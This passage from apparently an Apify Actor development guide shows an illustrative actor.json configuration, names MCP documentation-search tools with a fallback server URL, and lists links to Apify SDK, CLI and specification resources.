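To make the last two checklist points concrete, an `.actor/actor.json` might look roughly like this. All values here are illustrative (the exact field set is defined by the Actor specification; validate against `actor.schema.json` as listed above):

```json
{
    "actorSpecification": 1,
    "name": "my-actor",
    "title": "My Actor",
    "version": "0.1",
    "input": "./input_schema.json",
    "meta": {
        "generatedBy": "agent"
    }
}
```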

## Apify MCP Tools

If an MCP server is configured, use these tools for documentation:

- `search-apify-docs` - Search documentation
- `fetch-apify-docs` - Get full doc pages

Otherwise, use the MCP server URL: `https://mcp.apify.com/?tools=docs`.

## Resources

- [Actorization Academy](https://docs.apify.com/academy/actorization) - Comprehensive guide
- [Apify SDK for JavaScript](https://docs.apify.com/sdk/js) - Full SDK reference
- [Apify SDK for Python](https://docs.apify.com/sdk/python) - Full SDK reference
- [Apify CLI Reference](https://docs.apify.com/cli) - CLI commands
- [Actor Specification](https://raw.githubusercontent.com/apify/actor-whitepaper/refs/heads/master/README.md) - Complete specification